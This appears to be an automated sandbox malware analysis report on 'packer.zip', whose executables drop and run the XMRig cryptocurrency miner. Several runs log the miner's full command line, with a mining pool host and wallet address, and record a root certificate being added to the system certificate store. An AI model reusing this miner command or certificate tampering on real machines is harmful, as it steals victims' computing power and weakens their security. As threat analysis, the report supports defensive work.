Malware Analysis Report

2024-07-28 16:45

Sample ID 240616-v1237szgpc
Target packer.zip
SHA256 2712cfc84e57a8c2c3637bc69d65c1741fcb7a600c78709bbe3d47c5f76a4293
Tags
xmrig miner
Score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1 (Detonation Overview, Signatures)

Analysis: behavioral2, behavioral3, behavioral4, behavioral6, behavioral9, behavioral11, behavioral13, behavioral16, behavioral19, behavioral20, behavioral15, behavioral7, behavioral1, behavioral10, behavioral17, behavioral18, behavioral5, behavioral12, behavioral14, behavioral8 (each with Detonation Overview, Command Line, Signatures, Processes, Network, Files)

Analysis Overview

Score
10/10

SHA256

2712cfc84e57a8c2c3637bc69d65c1741fcb7a600c78709bbe3d47c5f76a4293

Threat Level: Known bad

The file packer.zip was found to be: Known bad.

Malicious Activity Summary

xmrig miner

xmrig

XMRig Miner payload

Executes dropped EXE

Unsigned PE

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious behavior: LoadsDriver

Modifies system certificate store

Suspicious use of FindShellTrayWindow

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-06-16 17:28

Signatures

Unsigned PE

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-16 17:28

Reported

2024-06-17 03:28

Platform

win10v2004-20240508-en

Max time kernel

1785s

Max time network

1798s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-06-16 17:28

Reported

2024-06-17 03:28

Platform

win10v2004-20240508-en

Max time kernel

1733s

Max time network

1746s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-06-16 17:28

Reported

2024-06-17 03:28

Platform

win10v2004-20240508-en

Max time kernel

1767s

Max time network

1782s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
US 52.111.229.43:443 tcp

Files

N/A

Analysis: behavioral6

Detonation Overview

Submitted

2024-06-16 17:28

Reported

2024-06-17 03:30

Platform

win10v2004-20240611-en

Max time kernel

1792s

Max time network

1804s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [certificate blob omitted] C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [certificate blob omitted] C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

Analysis: behavioral9

Detonation Overview

Submitted

2024-06-16 17:28

Reported

2024-06-17 03:33

Platform

win10v2004-20240508-en

Max time kernel

1791s

Max time network

1803s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3888,i,13640054265074968359,8146127767143474550,262144 --variations-seed-version --mojo-platform-channel-handle=1036 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3816,i,13640054265074968359,8146127767143474550,262144 --variations-seed-version --mojo-platform-channel-handle=4252 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp

Files

N/A

Analysis: behavioral11

Detonation Overview

Submitted

2024-06-16 17:28

Reported

2024-06-17 03:34

Platform

win10v2004-20240611-en

Max time kernel

1792s

Max time network

1799s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [certificate blob omitted] C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [certificate blob omitted] C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4344,i,11049150160560877369,2866371920339304689,262144 --variations-seed-version --mojo-platform-channel-handle=3944 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=1032,i,11049150160560877369,2866371920339304689,262144 --variations-seed-version --mojo-platform-channel-handle=1036 /prefetch:8

Network

Country Destination Domain Proto

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

Analysis: behavioral13

Detonation Overview

Submitted

2024-06-16 17:28

Reported

2024-06-17 03:36

Platform

win10v2004-20240611-en

Max time kernel

1793s

Max time network

1801s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [certificate blob omitted] C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [certificate blob omitted] C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

Analysis: behavioral16

Detonation Overview

Submitted

2024-06-16 17:28

Reported

2024-06-17 03:39

Platform

win10v2004-20240611-en

Max time kernel

1792s

Max time network

1784s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [certificate blob data omitted] C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

Analysis: behavioral19

Detonation Overview

Submitted

2024-06-16 17:28

Reported

2024-06-17 03:40

Platform

win10v2004-20240611-en

Max time kernel

1793s

Max time network

1803s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy.exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [certificate blob data omitted] C:\Users\Admin\AppData\Local\Temp\main - Copy.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy.exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

Analysis: behavioral20

Detonation Overview

Submitted

2024-06-16 17:28

Reported

2024-06-17 03:42

Platform

win10v2004-20240226-en

Max time kernel

1799s

Max time network

1820s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main.exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [certificate blob data omitted] C:\Users\Admin\AppData\Local\Temp\main.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2864 wrote to memory of 1272 N/A C:\Users\Admin\AppData\Local\Temp\main.exe C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
PID 2864 wrote to memory of 1272 N/A C:\Users\Admin\AppData\Local\Temp\main.exe C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

Processes

C:\Users\Admin\AppData\Local\Temp\main.exe

"C:\Users\Admin\AppData\Local\Temp\main.exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3692 --field-trial-handle=2244,i,11878111470816612087,2265290141962607370,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3972 --field-trial-handle=2244,i,11878111470816612087,2265290141962607370,262144 --variations-seed-version /prefetch:8

Network

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6


memory/1272-49-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-50-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-51-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-52-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-53-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-54-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-55-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-56-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-57-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-58-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-59-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-60-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-61-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-62-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-63-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-64-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-65-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-66-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-67-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-68-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-69-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-70-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-71-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-72-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-73-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-74-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-75-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-76-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-77-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-78-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-79-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-80-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-81-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-82-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-83-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-84-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

Analysis: behavioral15

Detonation Overview

Submitted

2024-06-16 17:28

Reported

2024-06-17 03:39

Platform

win10v2004-20240611-en

Max time kernel

1794s

Max time network

1786s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 27.73.42.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/4956-14-0x0000023371C00000-0x0000023371C20000-memory.dmp

memory/4956-15-0x0000023371C40000-0x0000023371C60000-memory.dmp

memory/4956-16-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-19-0x0000023371C80000-0x0000023371CA0000-memory.dmp

memory/4956-18-0x0000023371C60000-0x0000023371C80000-memory.dmp

memory/4956-17-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-20-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-21-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-23-0x0000023371C80000-0x0000023371CA0000-memory.dmp

